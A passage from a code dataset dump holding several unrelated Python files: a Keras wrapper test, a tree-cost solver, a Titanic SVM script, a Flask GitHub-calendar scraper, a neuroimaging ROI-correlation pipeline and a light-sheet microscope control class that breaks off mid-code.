\"uint8\", \"int16\", \"object\"])\n@pytest.mark.parametrize(\"run_eagerly\", [True, False])\ndef test_mixed_dtypes(y_dtype, X_dtype, run_eagerly):\n n, d = 20, 3\n n_classes = 3\n X = np.random.uniform(size=(n, d)).astype(X_dtype)\n y = np.random.choice(n_classes, size=n).astype(y_dtype)\n\n class StrictRegressor(KerasRegressor):\n def _fit_keras_model(\n self, X, y, sample_weight, warm_start, epochs, initial_epoch\n ):\n if X_dtype == \"object\":\n assert X.dtype == np.dtype(tf.keras.backend.floatx())\n else:\n assert X.dtype == np.dtype(X_dtype)\n if y_dtype == \"object\":\n assert y.dtype == np.dtype(tf.keras.backend.floatx())\n else:\n assert y.dtype == np.dtype(y_dtype)\n return super()._fit_keras_model(\n X, y, sample_weight, warm_start, epochs, initial_epoch\n )\n\n reg = StrictRegressor(\n model=dynamic_regressor,\n run_eagerly=run_eagerly,\n model__hidden_layer_sizes=(100,),\n )\n reg.fit(X, y)\n y_hat = reg.predict(X)\n if y.dtype.kind == \"f\":\n assert y_hat.dtype == np.dtype(y_dtype)\n else:\n assert y_hat.dtype.kind == \"f\"\n\n\ndef test_single_output_multilabel_indicator():\n \"\"\"Tests a target that a multilabel-indicator\n target can be used without errors.\n \"\"\"\n X = np.random.random(size=(100, 2))\n y = np.random.randint(0, 1, size=(100, 3))\n y[0, :] = 1 # i.e. not \"one hot encoded\"\n\n def build_fn():\n model = Sequential()\n model.add(Dense(10, input_shape=(2,), activation=\"relu\"))\n model.add(Dense(3, activation=\"sigmoid\"))\n return model\n\n clf = KerasClassifier(model=build_fn, loss=\"categorical_crossentropy\",)\n # check that there are no errors\n clf.fit(X, y)\n clf.predict(X)\n # check the target type\n assert clf.target_type_ == \"multilabel-indicator\"\n # check classes\n np.testing.assert_equal(clf.classes_, np.arange(3))\n","sub_path":"tests/test_input_outputs.py","file_name":"test_input_outputs.py","file_ext":"py","file_size_in_byte":14773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"330035262","text":"N = int(input())\nmat = [[0 for _ in range(N)] for _ in range(N)] \ninfo = [] \nfor i in range(N):\n fa, di, ci = [int(x) for x in input().split()]\n if fa != -1:\n mat[fa-1][i] = 1\n info.append([di, ci])\nres = 0\n\n\ndef find_min(node):\n ind = -1\n sub = [] # 子结点\n ans = info[node-1][1]\n while True:\n try:\n ind = mat[node-1].index(1, ind+1)\n sub.append(ind)\n except ValueError:\n break\n if len(sub) == 0: # 叶子结点\n return ans\n else:\n for i in sub:\n ans = min(ans, find_min(i+1))\n return ans\n\n\ndef dfs(node): # 先序遍历\n global res\n ind = -1\n sub = [] # 子结点\n while True:\n try:\n ind = mat[node-1].index(1, ind+1)\n sub.append(ind)\n except ValueError:\n break\n if len(sub) == 0: # 叶子结点\n res += info[node-1][0] * info[node-1][1]\n else:\n sum_dec = 0\n for i in sub:\n dfs(i+1)\n sum_dec += info[i][0]\n if info[node-1][0] < sum_dec:\n info[node-1][0] = sum_dec\n elif info[node-1][0] > sum_dec:\n cost = find_min(node)\n res += cost * (info[node-1][0]-sum_dec)\n return\n\n\nroot = 1\nfor i in range(N):\n flag = True\n for j in range(N):\n if mat[j][i] == 1:\n flag = False\n break\n if flag:\n root = i+1\n break\ndfs(root)\nprint(res)","sub_path":"Code/CodeRecords/2460/60675/309438.py","file_name":"309438.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"49012524","text":"import random\nimport pandas as pd\nimport numpy as np\nimport pygame\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler # 标签编码\nfrom sklearn.model_selection import cross_val_score, RandomizedSearchCV, train_test_split # k折交叉验证\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import accuracy_score\ntrain_data = pd.read_csv('titanic_train.csv')\ntest_data = pd.read_csv('titanic_test.csv')\n# 数据分析\n# print(test_data.info())#训练集信息\n\ntrain_data['Age'].fillna(train_data['Age'].mean(), inplace=True)\ntrain_data['Fare'].fillna(train_data['Fare'].mean(), inplace=True)\ntrain_data['Embarked'].fillna('S', inplace=True)\n#数据清洗结束,进行特征提取\nfeature = ['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Embarked']\ntrain_feature = train_data[feature]\ntrain_survived = train_data['Survived']\n\n#观看feature信息并处理\n# print(train_feature.info())#观看feature信息\nencoder = LabelEncoder()\ntrain_feature['Sex'] = encoder.fit_transform(train_feature['Sex'])\ntrain_feature['Embarked'] = encoder.fit_transform(train_feature['Embarked'])\n#print(train_feature.info())#观看修改过后的feature信息\n\n\n\n#归一化\nscaler = StandardScaler()\ntrain_feature.astype(float)\nX_train_scaled = scaler.fit_transform(train_feature)#均值归一化\nfeature_train, feature_test, survived_train, survived_test = train_test_split(X_train_scaled, train_survived, test_size=0.3, random_state=0)#划分测试集与训练集\nclassifier = SVC(C=2, kernel='rbf', gamma=10, decision_function_shape='ovo')\nclassifier.fit(feature_train,survived_train)\ntra_label = classifier.predict(feature_train)#训练集的预测标签\ntes_label = classifier.predict(feature_test)#测试集的预测标签\nprint(\"训练集:\",accuracy_score(survived_train, tra_label))\nprint(\"测试集:\",accuracy_score(survived_test, tes_label))","sub_path":"课程资料/机器学习/第三次/组/曹鹏霄/titanic_svm_cpx.py","file_name":"titanic_svm_cpx.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"231030924","text":"import requests\nfrom flask import Flask, render_template, jsonify\nfrom bs4 import BeautifulSoup\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef index():\n return app.send_static_file('index.html')\n\n\n@app.route(\"/\")\ndef user(user_name):\n soup = BeautifulSoup(requests.get('https://github.com/' + user_name).content, \"html.parser\")\n svg = soup.find('svg', {\"class\": \"js-calendar-graph-svg\"})\n firstg = svg.findChildren()[0]\n weeksg = firstg.find_all('g')\n result = []\n for weekg in weeksg:\n daysg = weekg.find_all('rect')\n week = []\n for dayrect in daysg:\n week.append({'data_count': int(dayrect['data-count']), 'data_date': dayrect['data-date']})\n result.append({'blocks': week})\n\n return jsonify(result)\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"flask/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"188204618","text":"#!/usr/bin/env python\n\"\"\"\nThis extracts the mean time series from the defined ROIs in MNI space (6 mm\nspheres). This data is returned as the time series & a full correlation matrix,\nin .csv format).\n\nUsage:\n dm_proc_rest.py [options] \n\nArguments:\n study name defined in master configuration .yml file\n\nOptions:\n --subject SUBJID Subject ID to run\n --debug Debug logging\n\nDETAILS\n\n 1) Produces a CSV of the ROI time series from the MNI-space atlas NIFTI in assets/.\n 2) Produces a correlation matrix of these same time series.\n\"\"\"\n\nfrom datman.docopt import docopt\nimport datman.utils as utils\nimport datman.config as cfg\nimport logging\nimport glob\nimport numpy as np\nimport os, sys\nimport time\nimport yaml\n\nlogging.basicConfig(level=logging.WARN, format=\"[%(name)s] %(levelname)s: %(message)s\")\nlogger = logging.getLogger(os.path.basename(__file__))\n\nNODE = os.uname()[1]\n\ndef get_inputs(config, path, exp, scanid):\n \"\"\"\n Finds the epitome exports matching the connectivity tag specified in the\n settings file\n \"\"\"\n inputs = []\n\n # get target epitome exports\n target_filetypes = config.study_config['fmri'][exp]['conn']\n if type(target_filetypes) == str:\n target_filetypes = [target_filetypes]\n\n # find the matching pre-processed output files\n candidates = glob.glob('{}/{}_*.nii.gz'.format(path, scanid))\n for filetype in target_filetypes:\n inputs.extend(filter(lambda x: filetype + '.nii.gz' in x, candidates))\n\n # remove GLM outputs\n inputs = filter(lambda x: '_glm_' not in x, inputs)\n\n return inputs\n\ndef run_analysis(scanid, config, study):\n \"\"\"\n Extracts: time series, correlation matricies using defined atlas.\n \"\"\"\n study_base = config.get_study_base(study)\n fmri_dir = os.path.join(study_base, config.site_config['paths']['fmri'])\n experiments = config.study_config['fmri'].keys()\n atlas = os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, 'assets/shen_2mm_268_parcellation.nii.gz')\n\n if not os.path.isfile(atlas):\n print('ERROR: atlas file {} not found'.format(atlas))\n sys.exit(1)\n\n for exp in experiments:\n path = os.path.join(fmri_dir, exp, scanid)\n\n # get filetypes to analyze, ignoring ROI files\n inputs = get_inputs(config, path, exp, scanid)\n\n for filename in inputs:\n basename = os.path.basename(utils.splitext(filename)[0])\n\n # if the final correlation matrix exists, skip processing\n if os.path.isfile(os.path.join(path, basename + '_roi-corrs.csv')):\n continue\n\n # generate ROI file in register with subject's data\n roi_file = os.path.join(path, basename + '_rois.nii.gz')\n if not os.path.isfile(roi_file):\n rtn, out = utils.run('3dresample -master {} -prefix {} -inset {}'.format(filename, roi_file, atlas))\n if rtn:\n logger.error('{}\\n{}'.format(out, NODE))\n raise Exception('Error resampling atlas {} to match {}.'.format(atlas, filename))\n else:\n pass\n\n rois, _, _, _ = utils.loadnii(roi_file)\n data, _, _, _ = utils.loadnii(filename)\n\n n_rois = len(np.unique(rois[rois > 0]))\n dims = np.shape(data)\n\n # loop through all ROIs, extracting mean timeseries.\n output = np.zeros((n_rois, dims[1]))\n\n for i, roi in enumerate(np.unique(rois[rois > 0])):\n idx = np.where(rois == roi)[0]\n\n if len(idx) > 0:\n output[i, :] = np.mean(data[idx, :], axis=0)\n\n # save the raw time series\n np.savetxt(os.path.join(path, basename + '_roi-timeseries.csv'), output, delimiter=',')\n\n # save the full correlation matrix\n corrs = np.corrcoef(output)\n np.savetxt(os.path.join(path, basename + '_roi-corrs.csv'), corrs, delimiter=',')\n\ndef main():\n\n arguments = docopt(__doc__)\n study = arguments['']\n scanid = arguments['--subject']\n debug = arguments['--debug']\n\n logging.info('Starting')\n if debug:\n logger.setLevel(logging.DEBUG)\n\n # load config for study\n try:\n config = cfg.config(study=study)\n except ValueError:\n logger.error('study {} not defined in master configuration file\\n{}'.format(study, NODE))\n sys.exit(1)\n\n study_base = config.get_study_base(study)\n\n if 'fmri' not in config.site_config['paths']:\n logger.error(\"paths:fmri not defined in site configuration file\\n{}\".format(NODE))\n sys.exit(1)\n\n fmri_dir = os.path.join(study_base, config.site_config['paths']['fmri'])\n\n if scanid:\n path = os.path.join(fmri_dir, scanid)\n try:\n run_analysis(scanid, config, study)\n except Exception as e:\n logger.error(e)\n sys.exit(1)\n\n # run in batch mode\n else:\n # look for subjects with at least one fmri type missing outputs\n subjects = []\n\n # loop through fmri experiments defined\n for exp in config.study_config['fmri'].keys():\n expected_files = config.study_config['fmri'][exp]['conn']\n fmri_dirs = glob.glob('{}/*'.format(os.path.join(fmri_dir, exp)))\n\n for subj_dir in fmri_dirs:\n candidates = glob.glob('{}/*'.format(subj_dir))\n for filetype in expected_files:\n # add subject if outputs don't already exist\n if not filter(lambda x: '{}_roi-corrs.csv'.format(filetype) in x, candidates):\n subjects.append(os.path.basename(subj_dir))\n break\n\n # collapse found subjects (do not double-count) and create a list of commands\n commands = []\n subjects = list(set(subjects))\n for subject in subjects:\n commands.append(\" \".join([__file__, study, '--subject {}'.format(subject)]))\n\n if commands:\n logger.debug('queueing up the following commands:\\n'+'\\n'.join(commands))\n\n for i, cmd in enumerate(commands):\n jobname = 'dm_rest_{}_{}'.format(i, time.strftime(\"%Y%m%d-%H%M%S\"))\n jobfile = '/tmp/{}'.format(jobname)\n logfile = '/tmp/{}.log'.format(jobname)\n errfile = '/tmp/{}.err'.format(jobname)\n with open(jobfile, 'wb') as fid:\n fid.write('#!/bin/bash\\n')\n fid.write(cmd)\n\n rtn, out = utils.run('qsub -V -q main.q -o {} -e {} -N {} {}'.format(\n logfile, errfile, jobname, jobfile))\n if rtn:\n logger.error(\"Job submission failed. Output follows. {}\".format(NODE))\n logger.error(\"stdout: {}\".format(out))\n sys.exit(1)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bin/dm_proc_rest.py","file_name":"dm_proc_rest.py","file_ext":"py","file_size_in_byte":6949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"646928783","text":"# Imports from the python standard library:\r\nimport time\r\nimport os\r\nfrom datetime import datetime\r\nimport atexit\r\nimport queue\r\n\r\n# Third party imports, installable via pip:\r\nimport numpy as np\r\nfrom scipy.ndimage import zoom, rotate, gaussian_filter1d\r\nfrom tifffile import imread, imwrite\r\n\r\n# Our code, one .py file per module, copy files to your local directory:\r\ntry:\r\n import pco_edge42_cl # github.com/amsikking/pco_edge42_cl\r\n import ni_PCIe_6738 # github.com/amsikking/ni_PCIe_6738\r\n import sutter_Lambda_10_3 # github.com/amsikking/sutter_Lambda_10_3\r\n import pi_C_867_2U2 # github.com/amsikking/pi_C_867_2U2\r\n import pi_E_709_1C1L # github.com/amsikking/pi_E_709_1C1L\r\n import thorlabs_MDT694B # github.com/amsikking/thorlabs_MDT694B\r\n import concurrency_tools as ct # github.com/AndrewGYork/tools\r\n from napari_in_subprocess import display # github.com/AndrewGYork/tools\r\nexcept Exception as e:\r\n print('sols_microscope.py -> One or more imports failed')\r\n print('sols_microscope.py -> error =',e)\r\n\r\n# SOLS optical configuration (edit as needed):\r\nM1 = 200 / 5; Mscan = 100 / 100; M2 = 10 / 300; M3 = 200 / 9\r\nMRR = M1 * Mscan * M2; Mtot = MRR * M3;\r\ncamera_px_um = 6.5; sample_px_um = camera_px_um / Mtot\r\ntilt = np.deg2rad(50)\r\n\r\nclass Microscope:\r\n def __init__(self,\r\n max_allocated_bytes, # Limit of available RAM for machine\r\n ao_rate, # slow ~1e3, medium ~1e4, fast ~1e5\r\n name='SOLS v1.1',\r\n verbose=True):\r\n self.name = name\r\n self.verbose = verbose\r\n if self.verbose: print(\"%s: opening...\"%self.name)\r\n self.unfinished_tasks = queue.Queue()\r\n slow_fw_init = ct.ResultThread(\r\n target=self._init_filter_wheel).start() #~5.3s\r\n slow_camera_init = ct.ResultThread(\r\n target=self._init_camera).start() #~3.6s\r\n slow_snoutfocus_init = ct.ResultThread(\r\n target=self._init_snoutfocus).start() #1s\r\n slow_focus_init = ct.ResultThread(\r\n target=self._init_focus_piezo).start() #~0.6s\r\n slow_stage_init = ct.ResultThread(\r\n target=self._init_XY_stage).start() #~0.4s\r\n self._init_display() #~1.3s\r\n self._init_datapreview() #~0.8s\r\n self._init_ao(ao_rate) #~0.2s\r\n slow_stage_init.get_result()\r\n slow_focus_init.get_result()\r\n slow_snoutfocus_init.get_result()\r\n slow_camera_init.get_result()\r\n slow_fw_init.get_result()\r\n self.max_allocated_bytes = max_allocated_bytes\r\n self.illumination_sources = ( # configure as needed\r\n 'LED', '405', '488', '561', '640', '405_on_during_rolling') \r\n self.max_bytes_per_buffer = (2**31) # legal tiff\r\n self.max_data_buffers = 4 # camera, preview, display, filesave\r\n self.max_preview_buffers = self.max_data_buffers\r\n self.preview_line_px = 10 # line thickness for previews\r\n # The pco_edge42_cl has unreliable pixel rows at the top and bottom,\r\n # so for clean previews it's best to remove them:\r\n self.preview_crop_px = 3 # crop top and bottom pixel rows for previews\r\n self.num_active_data_buffers = 0\r\n self.num_active_preview_buffers = 0\r\n self.timestamp_mode = \"binary+ASCII\"\r\n self.camera._set_timestamp_mode(self.timestamp_mode) # default on\r\n self._settings_applied = False\r\n if self.verbose: print(\"\\n%s: -> open and ready.\"%self.name)\r\n\r\n def _init_ao(self, ao_rate):\r\n self.names_to_voltage_channels = {\r\n '405_TTL': 0,\r\n '405_power': 1,\r\n '445_TTL': 2,\r\n '445_power': 3, \r\n '488_TTL': 4,\r\n '488_power': 5,\r\n '561_TTL': 6,\r\n '561_power': 7,\r\n '640_TTL': 8,\r\n '640_power': 9,\r\n 'LED_power': 10,\r\n 'camera': 11,\r\n 'galvo': 12,\r\n 'snoutfocus_piezo': 13,\r\n 'snoutfocus_shutter': 14,\r\n 'LSx_BFP': 16,\r\n 'LSy_BFP': 17,\r\n 'LSx_IMG': 18,\r\n 'LSy_IMG': 19,}\r\n if self.verbose: print(\"\\n%s: opening ao card...\"%self.name)\r\n self.ao = ni_PCIe_6738.DAQ(\r\n num_channels=20, rate=ao_rate, verbose=False)\r\n if self.verbose: print(\"\\n%s: -> ao card open.\"%self.name)\r\n atexit.register(self.ao.close)\r\n\r\n def _init_filter_wheel(self):\r\n if self.verbose: print(\"\\n%s: opening filter wheel...\"%self.name)\r\n self.filter_wheel = sutter_Lambda_10_3.Controller(\r\n which_port='COM7', verbose=False)\r\n if self.verbose: print(\"\\n%s: -> filter wheel open.\"%self.name) \r\n self.filter_wheel_position = 0\r\n atexit.register(self.filter_wheel.close)\r\n\r\n def _init_camera(self):\r\n if self.verbose: print(\"\\n%s: opening camera...\"%self.name)\r\n self.camera = ct.ObjectInSubprocess(\r\n pco_edge42_cl.Camera, verbose=False, close_method_name='close')\r\n if self.verbose: print(\"\\n%s: -> camera open.\"%self.name)\r\n\r\n def _init_snoutfocus(self):\r\n if self.verbose: print(\"\\n%s: opening snoutfocus piezo...\"%self.name)\r\n self.snoutfocus_controller = thorlabs_MDT694B.Controller(\r\n which_port='COM4', verbose=False)\r\n if self.verbose: print(\"\\n%s: -> snoutfocus piezo open.\"%self.name) \r\n atexit.register(self.snoutfocus_controller.close)\r\n\r\n def _init_focus_piezo(self):\r\n if self.verbose: print(\"\\n%s: opening focus piezo...\"%self.name)\r\n self.focus_piezo = pi_E_709_1C1L.Controller(\r\n which_port='COM3', z_min_um=0, z_max_um=800, verbose=False)\r\n if self.verbose: print(\"\\n%s: -> focus piezo open.\"%self.name)\r\n atexit.register(self.focus_piezo.close)\r\n\r\n def _init_XY_stage(self):\r\n if self.verbose: print(\"\\n%s: opening XY stage...\"%self.name) \r\n self.XY_stage = pi_C_867_2U2.Controller(\r\n which_port='COM6', verbose=False)\r\n if self.verbose: print(\"\\n%s: -> XY stage open.\"%self.name)\r\n atexit.register(self.XY_stage.close)\r\n\r\n def _init_datapreview(self):\r\n if self.verbose: print(\"\\n%s: opening datapreview...\"%self.name) \r\n self.datapreview = ct.ObjectInSubprocess(DataPreview)\r\n if self.verbose: print(\"\\n%s: -> datapreview open.\"%self.name) \r\n\r\n def _init_display(self):\r\n if self.verbose: print(\"\\n%s: opening display...\"%self.name) \r\n self.display = display()\r\n if self.verbose: print(\"\\n%s: -> display open.\"%self.name) \r\n\r\n def _check_memory(self): \r\n memory_exceeded = False\r\n # Data:\r\n self.images = (self.volumes_per_buffer *\r\n len(self.channels_per_slice) *\r\n self.slices_per_volume)\r\n self.bytes_per_data_buffer = (\r\n 2 * self.images * self.height_px * self.width_px)\r\n if self.bytes_per_data_buffer > self.max_bytes_per_buffer:\r\n print(\"\\n%s: ***WARNING*** -> settings rejected\"%self.name +\r\n \" (bytes_per_data_buffer > max)\")\r\n print(\"%s: -> reduce settings\"%self.name +\r\n \" or increase 'max_bytes_per_buffer'\")\r\n memory_exceeded = True\r\n # Preview:\r\n preview_shape = DataPreview.shape(self.volumes_per_buffer,\r\n self.slices_per_volume,\r\n len(self.channels_per_slice),\r\n self.height_px,\r\n self.width_px,\r\n self.scan_step_size_px,\r\n self.preview_line_px,\r\n self.preview_crop_px,\r\n self.timestamp_mode)\r\n self.bytes_per_preview_buffer = 2 * int(np.prod(preview_shape))\r\n if self.bytes_per_preview_buffer > self.max_bytes_per_buffer:\r\n print(\"\\n%s: ***WARNING*** -> settings rejected\"%self.name +\r\n \" (bytes_per_preview_buffer > max)\")\r\n print(\"%s: -> reduce settings\"%self.name +\r\n \" or increase 'max_bytes_per_buffer'\")\r\n memory_exceeded = True\r\n # Total:\r\n self.total_bytes = (\r\n self.bytes_per_data_buffer * self.max_data_buffers +\r\n self.bytes_per_preview_buffer * self.max_preview_buffers)\r\n if self.total_bytes > self.max_allocated_bytes:\r\n print(\"\\n%s: ***WARNING*** -> settings rejected\"%self.name +\r\n \" (total_bytes > max)\")\r\n print(\"%s: -> reduce settings\"%self.name +\r\n \" or increase 'max_allocated_bytes'\")\r\n memory_exceeded = True\r\n return memory_exceeded\r\n\r\n def _calculate_voltages(self):\r\n n2c = self.names_to_voltage_channels # nickname\r\n # Timing information:\r\n exposure_px = self.ao.s2p(1e-6 * self.camera.exposure_us)\r\n rolling_px = self.ao.s2p(1e-6 * self.camera.rolling_time_us)\r\n jitter_px = max(self.ao.s2p(30e-6), 1)\r\n period_px = max(exposure_px, rolling_px) + jitter_px\r\n # Galvo voltages:\r\n galvo_volts_per_um = -1.146 / 100 # calibrated using graticule\r\n galvo_scan_volts = galvo_volts_per_um * self.scan_range_um\r\n galvo_voltages = np.linspace(\r\n - galvo_scan_volts/2, galvo_scan_volts/2, self.slices_per_volume)\r\n # Calculate voltages:\r\n voltages = []\r\n for volumes in range(self.volumes_per_buffer):\r\n # TODO: either bidirectional volumes, or smoother galvo flyback\r\n for _slice in range(self.slices_per_volume):\r\n for channel, power in zip(self.channels_per_slice,\r\n self.power_per_channel):\r\n v = np.zeros((period_px, self.ao.num_channels), 'float64')\r\n v[:rolling_px, n2c['camera']] = 5 # falling edge-> light on!\r\n v[:, n2c['galvo']] = galvo_voltages[_slice]\r\n light_on_px = rolling_px\r\n if channel in ('405_on_during_rolling',): light_on_px = 0\r\n if channel != 'LED': # i.e. laser channels\r\n v[light_on_px:period_px - jitter_px,\r\n n2c[channel + '_TTL']] = 3\r\n v[light_on_px:period_px - jitter_px,\r\n n2c[channel + '_power']] = 4.5 * power / 100\r\n voltages.append(v)\r\n voltages = np.concatenate(voltages, axis=0)\r\n # Timing attributes:\r\n self.buffer_time_s = self.ao.p2s(voltages.shape[0])\r\n self.volumes_per_s = self.volumes_per_buffer / self.buffer_time_s\r\n return voltages\r\n\r\n def _plot_voltages(self):\r\n import matplotlib.pyplot as plt\r\n # Reverse lookup table; channel numbers to names:\r\n c2n = {v:k for k, v in self.names_to_voltage_channels.items()}\r\n for c in range(self.voltages.shape[1]):\r\n plt.plot(self.voltages[:, c], label=c2n.get(c, f'ao-{c}'))\r\n plt.legend(loc='upper right')\r\n xlocs, xlabels = plt.xticks()\r\n plt.xticks(xlocs, [self.ao.p2s(l) for l in xlocs])\r\n plt.ylabel('Volts')\r\n plt.xlabel('Seconds')\r\n plt.show()\r\n\r\n def _prepare_to_save(self, filename, folder_name, description, delay_s):\r\n def make_folders(folder_name):\r\n os.makedirs(folder_name)\r\n os.makedirs(folder_name + '\\data')\r\n os.makedirs(folder_name + '\\metadata')\r\n os.makedirs(folder_name + '\\preview') \r\n assert type(filename) is str\r\n if folder_name is None:\r\n folder_index = 0\r\n dt = datetime.strftime(datetime.now(),'%Y-%m-%d_%H-%M-%S')\r\n folder_name = dt + '_%03i_sols'%folder_index\r\n while os.path.exists(folder_name): # check overwriting\r\n folder_index +=1\r\n folder_name = dt + '_%03i_sols'%folder_index\r\n make_folders(folder_name)\r\n else:\r\n if not os.path.exists(folder_name): make_folders(folder_name)\r\n data_path = folder_name + '\\data\\\\' + filename\r\n metadata_path = folder_name + '\\metadata\\\\' + filename\r\n preview_path = folder_name + '\\preview\\\\' + filename\r\n self._save_metadata(filename, description, delay_s, metadata_path)\r\n return data_path, preview_path\r\n\r\n def _save_metadata(self, filename, description, delay_s, path):\r\n to_save = {\r\n 'Date':datetime.strftime(datetime.now(),'%Y-%m-%d'),\r\n 'Time':datetime.strftime(datetime.now(),'%H:%M:%S'),\r\n 'filename':filename,\r\n 'description':description,\r\n 'delay_s':delay_s,\r\n 'channels_per_slice':self.channels_per_slice,\r\n 'power_per_channel':self.power_per_channel,\r\n 'filter_wheel_position':self.filter_wheel_position,\r\n 'illumination_time_us':self.illumination_time_us,\r\n 'volumes_per_s':self.volumes_per_s,\r\n 'buffer_time_s':self.buffer_time_s,\r\n 'height_px':self.height_px,\r\n 'width_px':self.width_px,\r\n 'timestamp_mode':self.timestamp_mode,\r\n 'scan_step_size_px':self.scan_step_size_px,\r\n 'scan_step_size_um':calculate_scan_step_size_um(\r\n self.scan_step_size_px),\r\n 'slices_per_volume':self.slices_per_volume,\r\n 'scan_range_um': self.scan_range_um,\r\n 'volumes_per_buffer':self.volumes_per_buffer,\r\n 'focus_piezo_z_um':self.focus_piezo_z_um,\r\n 'XY_stage_position_mm':self.XY_stage_position_mm,\r\n 'preview_line_px':self.preview_line_px,\r\n 'preview_crop_px':self.preview_crop_px,\r\n 'MRR':MRR,\r\n 'Mtot':Mtot,\r\n 'tilt':tilt,\r\n 'sample_px_um':sample_px_um,\r\n 'voxel_aspect_ratio':calculate_voxel_aspect_ratio(\r\n self.scan_step_size_px),\r\n }\r\n with open(os.path.splitext(path)[0] + '.txt', 'w') as file:\r\n for k, v in to_save.items():\r\n file.write(k + ': ' + str(v) + '\\n')\r\n\r\n def _get_data_buffer(self, shape, dtype):\r\n while self.num_active_data_buffers >= self.max_data_buffers:\r\n time.sleep(1e-3) # 1.7ms min\r\n # Note: this does not actually allocate the memory. Allocation happens\r\n # during the first 'write' process inside camera.record_to_memory\r\n data_buffer = ct.SharedNDArray(shape, dtype)\r\n self.num_active_data_buffers += 1\r\n return data_buffer\r\n\r\n def _release_data_buffer(self, shared_numpy_array):\r\n assert isinstance(shared_numpy_array, ct.SharedNDArray)\r\n self.num_active_data_buffers -= 1\r\n\r\n def _get_preview_buffer(self, shape, dtype):\r\n while self.num_active_preview_buffers >= self.max_preview_buffers:\r\n time.sleep(1e-3) # 1.7ms min\r\n # Note: this does not actually allocate the memory. Allocation happens\r\n # during the first 'write' process inside camera.record_to_memory\r\n preview_buffer = ct.SharedNDArray(shape, dtype)\r\n self.num_active_preview_buffers += 1\r\n return preview_buffer\r\n\r\n def _release_preview_buffer(self, shared_numpy_array):\r\n assert isinstance(shared_numpy_array, ct.SharedNDArray)\r\n self.num_active_preview_buffers -= 1\r\n\r\n def apply_settings( # Must call before .acquire()\r\n self,\r\n channels_per_slice=None, # Tuple of strings\r\n power_per_channel=None, # Tuple of floats\r\n filter_wheel_position=None, # Int\r\n illumination_time_us=None, # Float\r\n height_px=None, # Int\r\n width_px=None, # Int\r\n timestamp_mode=None, # \"off\" or \"binary\" or \"binary+ASCII\"\r\n voxel_aspect_ratio=None, # Int\r\n scan_range_um=None, # Int or float\r\n volumes_per_buffer=None, # Int\r\n focus_piezo_z_um=None, # (Float, \"relative\" or \"absolute\")\r\n XY_stage_position_mm=None, # (Float, Float, \"relative\" or \"absolute\")\r\n max_bytes_per_buffer=None, # Int\r\n max_data_buffers=None, # Int\r\n max_preview_buffers=None, # Int\r\n preview_line_px=None, # Int\r\n preview_crop_px=None, # Int\r\n ):\r\n args = locals()\r\n args.pop('self')\r\n def settings_task(custody):\r\n custody.switch_from(None, to=self.camera) # Safe to change settings\r\n self._settings_applied = False # In case the thread crashes\r\n # Attributes must be set previously or currently:\r\n for k, v in args.items(): \r\n if v is not None:\r\n setattr(self, k, v) # A lot like self.x = x\r\n assert hasattr(self, k), (\r\n \"%s: attribute %s must be set at least once\"%(self.name, k))\r\n if height_px is not None or width_px is not None: # legalize first\r\n h_px, w_px = height_px, width_px\r\n if height_px is None: h_px = self.height_px\r\n if width_px is None: w_px = self.width_px\r\n self.height_px, self.width_px, self.roi_px = ( \r\n pco_edge42_cl.legalize_image_size(\r\n h_px, w_px, verbose=False))\r\n if voxel_aspect_ratio is not None or scan_range_um is not None:\r\n self.scan_step_size_px, self.slices_per_volume = (\r\n calculate_cuboid_voxel_scan(self.voxel_aspect_ratio,\r\n self.scan_range_um))\r\n self.scan_range_um = calculate_scan_range_um(\r\n self.scan_step_size_px, self.slices_per_volume)\r\n assert 0 <= self.scan_range_um <= 500 # optical limit\r\n memory_exceeded = self._check_memory()\r\n if memory_exceeded:\r\n custody.switch_from(self.camera, to=None)\r\n return\r\n # Send hardware commands, slowest to fastest:\r\n if XY_stage_position_mm is not None:\r\n assert XY_stage_position_mm[2] in ('relative', 'absolute')\r\n x, y = XY_stage_position_mm[0], XY_stage_position_mm[1]\r\n if XY_stage_position_mm[2] == 'relative':\r\n self.XY_stage.move_mm(x, y, block=False)\r\n if XY_stage_position_mm[2] == 'absolute':\r\n self.XY_stage.move_mm(x, y, relative=False, block=False)\r\n if filter_wheel_position is not None:\r\n self.filter_wheel.move(filter_wheel_position,\r\n speed=6,\r\n block=False)\r\n if focus_piezo_z_um is not None:\r\n assert focus_piezo_z_um[1] in ('relative', 'absolute')\r\n z = focus_piezo_z_um[0]\r\n if focus_piezo_z_um[1] == 'relative':\r\n self.focus_piezo.move_um(z, block=False)\r\n if focus_piezo_z_um[1] == 'absolute':\r\n self.focus_piezo.move_um(z, relative=False, block=False)\r\n if (height_px is not None or\r\n width_px is not None or\r\n illumination_time_us is not None):\r\n self.camera._disarm()\r\n self.camera._set_roi(self.roi_px) # height_px updated first\r\n self.camera._set_exposure_time_us(int( \r\n self.illumination_time_us + self.camera.rolling_time_us))\r\n self.camera._arm(self.camera._num_buffers)\r\n if timestamp_mode is not None:\r\n self.camera._set_timestamp_mode(timestamp_mode)\r\n check_write_voltages_thread = False\r\n if (channels_per_slice is not None or\r\n power_per_channel is not None or\r\n illumination_time_us is not None or\r\n voxel_aspect_ratio is not None or\r\n scan_range_um is not None or\r\n volumes_per_buffer is not None):\r\n for channel in self.channels_per_slice:\r\n assert channel in self.illumination_sources\r\n assert len(self.power_per_channel) == (\r\n len(self.channels_per_slice))\r\n for power in self.power_per_channel: assert 0 <= power <= 100\r\n assert type(self.volumes_per_buffer) is int\r\n assert self.volumes_per_buffer > 0\r\n self.camera.num_images = self.images # update attribute\r\n self.voltages = self._calculate_voltages()\r\n write_voltages_thread = ct.ResultThread(\r\n 